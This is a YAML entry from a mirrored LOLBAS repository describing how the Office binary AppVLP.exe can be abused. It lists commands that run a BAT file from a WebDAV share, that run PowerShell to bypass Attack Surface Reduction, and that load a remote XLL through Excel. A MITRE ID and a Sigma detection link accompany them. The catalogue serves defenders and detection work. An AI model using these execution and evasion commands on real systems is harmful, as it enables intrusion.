public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-11-04 02:29:34 +01:00
Code Issues Projects Releases Wiki Activity
Files
7e1b09413f3a70c378d1654b541064cdba356574
LOLBAS/yml/OtherMSBinaries/Appvlp.yml
Wietze ebbf08ec4d Adding tags (closes #9, #318) (#362) 
* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
2024-04-03 11:53:36 -04:00

45 lines
2.0 KiB
YAML
Raw Blame History

---
Name: Appvlp.exe
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: AppVLP.exe \\webdav\calc.bat
Usecase: Execution of BAT file hosted on Webdav server.
Description: Executes calc.bat through AppVLP.exe
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
Resources:
- Link: https://github.com/MoooKitty/Code-Execution
- Link: https://twitter.com/moo_hax/status/892388990686347264
- Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
- Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
Acknowledgement:
- Person: fab
Handle: '@0rbz_'
- Person: Will
Handle: '@moo_hax'
- Person: Matt Wilson
Handle: '@enigma0x3'
Reference in New Issue View Git Blame Copy Permalink